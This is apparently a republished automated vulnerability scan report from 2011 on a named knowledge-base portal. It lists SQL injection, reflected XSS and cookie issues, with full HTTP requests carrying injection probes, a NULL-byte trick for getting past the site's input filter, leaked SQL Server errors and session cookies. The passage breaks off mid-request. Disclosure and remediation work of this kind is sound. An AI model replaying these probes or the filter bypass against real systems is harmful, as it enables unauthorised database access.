http://kbportal.thomson.com/index.aspx?t=&article=&c=12&cid=21&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45%00'&cat=&catURL=

Report generated by XSS.CX at Tue Apr 26 15:53:17 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://kbportal.thomson.com/ [PW parameter]

1.2. http://kbportal.thomson.com/ [UN parameter]

1.3. http://kbportal.thomson.com/ [cid parameter]

1.4. http://kbportal.thomson.com/ [cpc parameter]

1.5. http://kbportal.thomson.com/display/2/login.aspx [cpid parameter]

1.6. http://kbportal.thomson.com/display/2/login.aspx [password parameter]

1.7. http://kbportal.thomson.com/display/2/login.aspx [username parameter]

1.8. http://kbportal.thomson.com/index.aspx [cid parameter]

1.9. http://kbportal.thomson.com/index.aspx [cpc parameter]

2. Cross-site scripting (reflected)

2.1. http://kbportal.thomson.com/display/2/_midframe.aspx [tab parameter]

2.2. http://kbportal.thomson.com/display/2/index.aspx [tab parameter]

2.3. http://kbportal.thomson.com/display/2/optframe.aspx [opt parameter]

3. Cookie without HttpOnly flag set

3.1. http://kbportal.thomson.com/

3.2. http://kbportal.thomson.com/display/2/index.aspx

3.3. http://kbportal.thomson.com/display/2/kb/cat.aspx

3.4. http://kbportal.thomson.com/display/2/login.aspx

3.5. http://kbportal.thomson.com/index.aspx

4. Email addresses disclosed

5. HTML does not specify charset

5.1. http://kbportal.thomson.com/display/2/_dividerFrame.html

5.2. http://kbportal.thomson.com/display/2/leftframe_files/_greybar.html

5.3. http://kbportal.thomson.com/pc/12/categoryList/21/2/cat_index.html

5.4. http://kbportal.thomson.com/pc/12/categoryList/88/2/cat_index.html

6. Content type incorrectly stated



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://kbportal.thomson.com/ [PW parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The PW parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the PW parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO%00' HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:47:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.2. http://kbportal.thomson.com/ [UN parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The UN parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the UN parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO%00'&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.3. http://kbportal.thomson.com/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?cid=21%00'&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:44:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6551

<html>
<head>
<title>ERROR [42S22] [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Lan_code'.</title>
<style>
   body {font-family:"Verdana";font-weig
...[SNIP]...

1.4. http://kbportal.thomson.com/ [cpc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70%00'&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; s_cc=true; LangCode=en-US; LangId=1; IWICategory=IWICategory=; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%5D; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7472

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near '0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70'.</title>
...[SNIP]...

1.5. http://kbportal.thomson.com/display/2/login.aspx [cpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The cpid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cpid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /display/2/login.aspx?cpid=21'&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6451

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near ''.</title>
<style>
   body {font-family:"Verdana";font-weight:nor
...[SNIP]...

1.6. http://kbportal.thomson.com/display/2/login.aspx [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The password parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the password parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /display/2/login.aspx?cpid=21&username=CSO&password=CSO%00'&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:05:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.7. http://kbportal.thomson.com/display/2/login.aspx [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /display/2/login.aspx?cpid=21&username=CSO%00'&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D; IWICategory=IWICategory=21; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:05:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7066

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'CSO'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'CSO'.</title>
...[SNIP]...

1.8. http://kbportal.thomson.com/index.aspx [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.aspx?t=&article=&c=12&cid=21%00'&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
